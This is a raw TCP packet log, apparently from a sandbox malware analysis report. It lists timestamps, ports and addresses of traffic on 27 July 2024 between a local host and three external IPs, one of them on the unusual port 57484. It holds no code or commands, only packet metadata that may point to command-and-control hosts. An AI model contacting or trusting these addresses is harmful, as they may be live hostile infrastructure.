                                                        Jul 27, 2024 13:31:02.638681889 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638699055 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638715029 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638731003 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638741016 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.638746977 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638762951 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638787985 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.638825893 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.639619112 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.639636040 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.639651060 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.639667988 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.639681101 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.639735937 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.640125990 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640145063 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640160084 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640176058 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640186071 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.640192032 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640207052 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640228033 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.640266895 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.641128063 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641144037 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641159058 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641175032 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641191006 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641206026 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641221046 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641227961 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.641256094 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.641278982 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.642117977 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642133951 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642149925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642165899 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642180920 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642193079 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.642195940 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642211914 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642218113 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.642267942 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.643137932 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643153906 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643168926 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643184900 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643199921 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643205881 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.643215895 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643248081 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.644108057 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644123077 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644136906 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644153118 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644167900 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644167900 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.644181967 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644187927 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.644197941 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644233942 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.644262075 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645138025 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645153999 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645168066 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645184040 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645198107 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645212889 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645214081 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645230055 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645241976 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645288944 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645921946 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645939112 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645953894 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645970106 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645982027 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645986080 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646003008 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646018982 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646025896 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646061897 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646089077 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646859884 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646876097 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646889925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646905899 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646920919 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646936893 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646936893 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646953106 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646955967 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646969080 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647002935 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.647032022 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.647825003 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647840977 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647855997 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647874117 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647886038 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647895098 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647908926 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647913933 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.647924900 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647936106 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.647977114 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.648721933 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648739100 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648753881 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648770094 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648786068 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648802042 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648802996 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.648817062 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648833036 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648847103 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.648868084 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.648894072 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.649646997 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649663925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649678946 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649694920 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649710894 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649719000 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.649727106 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649755001 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.649766922 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649801970 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.650513887 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650530100 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650544882 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650559902 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650569916 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.650576115 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650598049 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.650625944 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.701441050 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701530933 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701548100 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701586962 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.701741934 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701759100 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701801062 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.701993942 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.702009916 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.702049017 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.729921103 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.729965925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.729990959 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.730207920 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730288982 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.730319977 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730336905 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730353117 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730386019 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.730519056 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730571032 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.730674028 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730690002 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730705023 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730736971 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731075048 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731089115 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731103897 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731121063 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731137991 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731137991 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731153965 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731168985 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731220961 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731628895 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:05.460515022 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:31:05.460515022 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:31:05.465619087 CEST8049709178.237.33.50192.168.2.5
                                                        Jul 27, 2024 13:31:06.094608068 CEST8049709178.237.33.50192.168.2.5
                                                        Jul 27, 2024 13:31:06.094769955 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:31:06.105642080 CEST4970657484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:06.110621929 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.829454899 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.829503059 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.829538107 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.829565048 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:06.829569101 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.829605103 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.829667091 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:06.849039078 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.849123001 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.849159002 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.849176884 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:06.849193096 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.849230051 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:06.849282980 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.094137907 CEST8049709178.237.33.50192.168.2.5
                                                        Jul 27, 2024 13:31:07.095472097 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:31:07.318195105 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318295956 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318356037 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318377972 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.318389893 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318424940 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318478107 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318487883 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.318511963 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318542004 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.318586111 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318619013 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318631887 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.318651915 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.318825960 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.329286098 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.329386950 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.329436064 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.329456091 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.329468966 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.329531908 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.329864979 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.329900026 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.329935074 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.329993963 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.330050945 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.330111980 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:07.330116034 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.330213070 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.330241919 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:07.330301046 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.185432911 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.185465097 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.185476065 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.185487986 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.185633898 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.185729027 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.185750961 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.185772896 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.185796022 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.185816050 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.185858965 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.185982943 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186260939 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186280966 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186302900 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186325073 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186346054 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186352015 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.186367989 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186388969 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186391115 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.186413050 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186414003 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.186436892 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186460018 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.186460972 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.186508894 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.187897921 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.187920094 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.187941074 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.187962055 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.187983990 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.187999964 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.188004971 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.188030005 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.188046932 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.188054085 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.188069105 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.188086987 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.188108921 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.188122034 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.188157082 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.188174009 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.188205957 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.188952923 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.189003944 CEST5748449708192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.189007044 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.189044952 CEST4970857484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.189852953 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.189908981 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.293004036 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293091059 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293127060 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293152094 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.293181896 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293232918 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.293256998 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293291092 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293327093 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293343067 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.293407917 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293442011 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293452024 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.293477058 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.293524027 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.293648005 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.294370890 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.294433117 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.294435978 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.294471979 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.294523954 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.294608116 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.294642925 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.294696093 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.295195103 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.295275927 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.295310020 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.295329094 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.295469999 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.295504093 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.295521975 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.296067953 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.296118975 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.296154976 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.296188116 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.296236038 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.296315908 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.296367884 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.296420097 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.297151089 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.297202110 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.297235966 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.297255039 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.297404051 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.297439098 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.297457933 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.298007011 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.298058987 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.298059940 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.298095942 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.298137903 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:08.298197985 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:08.298232079 CEST5748449707192.253.251.227192.168.2.5
